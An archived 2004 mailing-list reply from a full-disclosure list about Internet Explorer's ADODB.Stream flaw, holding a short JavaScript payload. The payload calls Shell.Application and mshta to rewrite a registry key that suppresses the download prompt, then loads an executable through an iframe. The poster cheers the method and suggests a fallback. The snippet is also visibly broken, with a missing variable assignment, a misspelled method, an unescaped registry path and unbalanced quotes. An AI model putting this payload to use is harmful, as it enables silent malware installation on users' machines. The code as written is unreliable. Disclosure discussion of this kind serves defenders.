Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out

http-equiv_at_excite.com
Date: 07/03/04

  • Next message: Drew Copley: "Re: Microsoft Word Email Object Data Vulnerability"
    Date:         Sat, 3 Jul 2004 01:45:29 -0000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

      <!--

    ActiveXObject("Shell.Application");
    obj.ShellExecut("mshta.exe","about:<script>var wsh=new
    ActiveXObject('WScript.Shell');wsh.RegWrite
    ('HKCRexefileEditFlags', 0x38070000, "REG_BINARY");)
    </script><iframe src=foo.exe>");

     -->

    On quick reflection, I completely missed Matthew's point. It's
    brilliant. If you can indeed kill the download dialog, kill it,
    stick a frame in it and bang. If it doesn't work, use the
    regWrite and re-set the adodb.stream instead, and continue on
    your merry way.

    --
    http://www.malware.com
    -----
    NTBugtraq Editor's Note:
    Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field.
    -----
    

  • Next message: Drew Copley: "Re: Microsoft Word Email Object Data Vulnerability"

    Relevant Pages